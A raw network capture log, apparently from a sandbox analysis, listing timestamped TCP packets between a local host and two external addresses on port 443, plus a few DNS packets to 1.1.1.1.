Jan 11, 2025 04:35:15.614751101 CET	51649	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:15.615248919 CET	51649	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:15.615268946 CET	443	51649	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:15.615418911 CET	51649	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:15.615425110 CET	443	51649	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:15.994008064 CET	443	51649	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:15.994127035 CET	51649	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:15.994201899 CET	51649	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:15.994260073 CET	443	51649	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:15.994323969 CET	51649	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:16.005184889 CET	51650	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:16.005230904 CET	443	51650	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:16.005374908 CET	51650	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:16.005744934 CET	51650	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:16.005758047 CET	443	51650	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:16.633011103 CET	443	51650	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:16.633097887 CET	51650	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:16.633516073 CET	51650	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:16.633522987 CET	443	51650	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:16.633663893 CET	51650	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:16.633671999 CET	443	51650	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:17.062081099 CET	443	51650	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:17.062164068 CET	443	51650	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:17.062206030 CET	51650	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:17.062228918 CET	443	51650	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:17.062239885 CET	443	51650	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:17.062239885 CET	51650	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:17.062271118 CET	51650	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:17.062824011 CET	51650	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:17.062839031 CET	443	51650	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:27.079169035 CET	51651	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:27.079211950 CET	443	51651	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:27.079301119 CET	51651	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:27.079605103 CET	51651	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:27.079631090 CET	443	51651	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:27.734380960 CET	443	51651	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:27.734514952 CET	51651	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:27.737081051 CET	443	51651	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:27.737191916 CET	51651	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:27.739083052 CET	51651	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:27.739094019 CET	443	51651	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:27.739566088 CET	443	51651	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:27.739648104 CET	51651	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:27.740020990 CET	51651	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:27.783327103 CET	443	51651	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:28.120208979 CET	443	51651	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:28.120280981 CET	51651	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:28.120295048 CET	443	51651	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:28.120342016 CET	51651	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:28.120429993 CET	51651	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:28.120534897 CET	443	51651	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:28.120804071 CET	51651	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:28.132138014 CET	51652	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:28.132172108 CET	443	51652	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:28.132397890 CET	51652	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:28.132625103 CET	51652	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:28.132641077 CET	443	51652	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:28.765511990 CET	443	51652	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:28.765583038 CET	51652	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:28.766000986 CET	51652	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:28.766005993 CET	443	51652	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:28.766197920 CET	51652	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:28.766205072 CET	443	51652	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:29.203291893 CET	443	51652	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:29.203353882 CET	51652	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:29.203430891 CET	443	51652	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:29.203479052 CET	51652	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:29.203491926 CET	443	51652	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:29.203536034 CET	51652	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:29.203551054 CET	443	51652	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:29.203596115 CET	51652	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:29.203603029 CET	443	51652	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:29.203633070 CET	443	51652	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:29.203643084 CET	51652	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:29.203675985 CET	51652	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:29.204544067 CET	51652	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:29.204557896 CET	443	51652	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:39.219162941 CET	51653	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:39.219202995 CET	443	51653	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:39.219336987 CET	51653	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:39.219697952 CET	51653	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:39.219712973 CET	443	51653	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:39.854494095 CET	443	51653	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:39.854623079 CET	51653	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:39.855598927 CET	443	51653	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:39.855678082 CET	51653	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:39.857620001 CET	51653	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:39.857647896 CET	443	51653	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:39.858006001 CET	443	51653	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:39.858145952 CET	51653	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:39.858558893 CET	51653	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:39.899332047 CET	443	51653	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:40.233702898 CET	443	51653	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:40.233901978 CET	51653	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:40.233917952 CET	443	51653	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:40.234014034 CET	51653	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:40.234014034 CET	51653	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:40.234025955 CET	443	51653	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:40.234067917 CET	443	51653	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:40.234123945 CET	51653	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:40.234123945 CET	51653	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:40.242301941 CET	51654	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:40.242347956 CET	443	51654	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:40.242420912 CET	51654	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:40.242630959 CET	51654	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:40.242649078 CET	443	51654	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:40.867822886 CET	443	51654	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:40.867916107 CET	51654	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:40.868443966 CET	51654	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:40.868451118 CET	443	51654	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:40.868505955 CET	51654	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:40.868518114 CET	443	51654	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:41.298587084 CET	443	51654	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:41.298662901 CET	51654	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:41.298672915 CET	443	51654	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:41.298716068 CET	51654	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:41.298728943 CET	443	51654	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:41.298773050 CET	51654	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:41.298778057 CET	443	51654	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:41.298799992 CET	443	51654	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:41.298820972 CET	51654	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:41.298851013 CET	51654	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:41.299195051 CET	51654	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:41.299210072 CET	443	51654	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:51.312872887 CET	51655	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:51.312896013 CET	443	51655	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:51.312967062 CET	51655	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:51.313287973 CET	51655	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:51.313298941 CET	443	51655	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:51.966453075 CET	443	51655	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:51.966613054 CET	51655	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:51.967171907 CET	51655	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:51.967180967 CET	443	51655	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:51.967349052 CET	51655	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:51.967355013 CET	443	51655	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:52.362832069 CET	443	51655	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:52.362904072 CET	51655	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:52.363018990 CET	51655	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:52.363070965 CET	443	51655	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:52.363126040 CET	51655	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:52.363533974 CET	51656	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:52.363569975 CET	443	51656	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:52.363656044 CET	51656	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:52.363807917 CET	51656	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:52.363821030 CET	443	51656	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:53.016976118 CET	443	51656	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:53.017056942 CET	51656	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:53.017497063 CET	51656	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:53.017503977 CET	443	51656	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:53.017641068 CET	51656	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:53.017647028 CET	443	51656	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:53.446655989 CET	443	51656	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:53.446731091 CET	443	51656	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:53.446800947 CET	443	51656	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:53.446846008 CET	51656	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:53.446898937 CET	51656	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:53.447473049 CET	51656	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:53.447480917 CET	443	51656	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:03.469093084 CET	51657	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:03.469134092 CET	443	51657	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:03.469211102 CET	51657	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:03.469532013 CET	51657	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:03.469551086 CET	443	51657	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:04.120918989 CET	443	51657	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:04.120997906 CET	51657	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:04.121998072 CET	443	51657	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:04.122066975 CET	51657	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:04.169054985 CET	51657	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:04.169078112 CET	443	51657	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:04.169523954 CET	443	51657	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:04.169588089 CET	51657	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:04.170200109 CET	51657	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:04.211322069 CET	443	51657	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:04.508750916 CET	443	51657	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:04.508886099 CET	51657	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:04.508897066 CET	443	51657	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:04.508949995 CET	51657	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:04.509006023 CET	51657	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:04.509063005 CET	443	51657	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:04.509130955 CET	51657	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:04.523822069 CET	51658	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:04.523853064 CET	443	51658	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:04.523920059 CET	51658	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:04.524178028 CET	51658	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:04.524194002 CET	443	51658	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:05.176053047 CET	443	51658	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:05.177167892 CET	51658	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:05.177592993 CET	51658	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:05.177606106 CET	443	51658	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:05.177742004 CET	51658	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:05.177747965 CET	443	51658	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:05.611799002 CET	443	51658	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:05.611898899 CET	443	51658	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:05.611952066 CET	51658	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:05.611952066 CET	51658	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:05.611972094 CET	443	51658	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:05.611999989 CET	443	51658	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:05.612034082 CET	51658	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:05.612061024 CET	51658	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:05.612864971 CET	51658	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:05.612883091 CET	443	51658	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:15.661236048 CET	51659	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:15.661287069 CET	443	51659	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:15.661362886 CET	51659	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:15.661711931 CET	51659	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:15.661722898 CET	443	51659	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:16.315690994 CET	443	51659	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:16.315774918 CET	51659	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:16.318353891 CET	443	51659	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:16.318434000 CET	51659	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:16.319789886 CET	51659	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:16.319799900 CET	443	51659	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:16.320096970 CET	443	51659	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:16.320149899 CET	51659	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:16.320386887 CET	51659	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:16.363326073 CET	443	51659	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:16.700010061 CET	443	51659	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:16.700114965 CET	51659	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:16.700134039 CET	443	51659	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:16.700181961 CET	51659	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:16.700277090 CET	51659	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:16.700305939 CET	443	51659	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:16.700350046 CET	51659	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:16.712157965 CET	51660	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:16.712204933 CET	443	51660	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:16.712275982 CET	51660	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:16.712537050 CET	51660	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:16.712544918 CET	443	51660	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:17.369136095 CET	443	51660	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:17.370527983 CET	51660	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:17.370975018 CET	51660	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:17.370985031 CET	443	51660	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:17.371135950 CET	51660	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:17.371141911 CET	443	51660	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:17.805804968 CET	443	51660	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:17.805957079 CET	51660	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:17.805986881 CET	443	51660	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:17.806005955 CET	443	51660	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:17.806037903 CET	51660	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:17.806046009 CET	443	51660	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:17.806056023 CET	51660	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:17.806097984 CET	51660	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:17.806102991 CET	443	51660	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:17.806140900 CET	51660	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:17.806189060 CET	443	51660	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:17.806411028 CET	51660	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:17.806839943 CET	51660	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:17.806854010 CET	443	51660	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:27.828051090 CET	51661	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:27.828110933 CET	443	51661	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:27.828205109 CET	51661	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:27.828474998 CET	51661	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:27.828495026 CET	443	51661	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:28.459830046 CET	443	51661	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:28.459995985 CET	51661	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:28.462516069 CET	443	51661	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:28.462608099 CET	51661	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:28.464323044 CET	51661	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:28.464334965 CET	443	51661	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:28.465306997 CET	443	51661	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:28.468463898 CET	51661	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:28.468883991 CET	51661	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:28.511343002 CET	443	51661	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:28.848339081 CET	443	51661	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:28.849208117 CET	443	51661	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:28.849292040 CET	51661	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:28.849313021 CET	51661	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:28.849459887 CET	51661	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:28.849478960 CET	443	51661	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:28.871156931 CET	51662	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:28.871198893 CET	443	51662	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:28.871277094 CET	51662	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:28.871546984 CET	51662	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:28.871557951 CET	443	51662	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:29.516614914 CET	443	51662	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:29.516709089 CET	51662	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:29.543418884 CET	51662	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:29.543430090 CET	443	51662	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:29.543595076 CET	51662	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:29.543598890 CET	443	51662	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:29.965455055 CET	443	51662	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:29.965609074 CET	51662	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:29.965641022 CET	443	51662	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:29.965662003 CET	443	51662	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:29.965693951 CET	51662	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:29.965701103 CET	443	51662	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:29.965711117 CET	51662	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:29.965751886 CET	51662	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:29.965756893 CET	443	51662	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:29.965799093 CET	51662	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:29.965826988 CET	443	51662	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:29.965879917 CET	51662	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:29.966424942 CET	51662	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:29.966439962 CET	443	51662	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:39.983915091 CET	51663	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:39.983971119 CET	443	51663	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:39.984129906 CET	51663	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:39.984385014 CET	51663	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:39.984404087 CET	443	51663	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:40.728321075 CET	443	51663	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:40.728414059 CET	51663	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:40.728960991 CET	51663	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:40.728971958 CET	443	51663	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:40.729079962 CET	51663	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:40.729085922 CET	443	51663	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:41.122747898 CET	443	51663	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:41.122874022 CET	51663	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:41.122890949 CET	443	51663	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:41.122927904 CET	51663	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:41.122960091 CET	443	51663	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:41.123054028 CET	51663	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:41.123336077 CET	51663	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:36:41.123356104 CET	443	51663	142.250.181.238	192.168.2.5
Jan 11, 2025 04:36:41.137492895 CET	51664	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:41.137541056 CET	443	51664	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:41.137613058 CET	51664	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:41.137836933 CET	51664	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:41.137854099 CET	443	51664	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:41.779450893 CET	443	51664	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:41.779593945 CET	51664	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:41.780173063 CET	51664	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:41.780188084 CET	443	51664	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:41.780365944 CET	51664	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:41.780373096 CET	443	51664	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:42.216026068 CET	443	51664	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:42.216206074 CET	443	51664	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:42.216212988 CET	51664	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:42.216236115 CET	443	51664	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:42.216278076 CET	51664	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:42.216321945 CET	51664	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:42.216329098 CET	443	51664	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:42.216382027 CET	51664	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:42.216392994 CET	443	51664	142.250.185.225	192.168.2.5
Jan 11, 2025 04:36:42.216497898 CET	51664	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:42.217195034 CET	51664	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:36:42.217215061 CET	443	51664	142.250.185.225	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 04:33:58.962757111 CET	53	60687	1.1.1.1	192.168.2.5
Jan 11, 2025 04:34:50.521953106 CET	63963	53	192.168.2.5	1.1.1.1
Jan 11, 2025 04:34:50.529300928 CET	53	63963	1.1.1.1	192.168.2.5
Jan 11, 2025 04:34:51.620888948 CET	62902	53	192.168.2.5	1.1.1.1
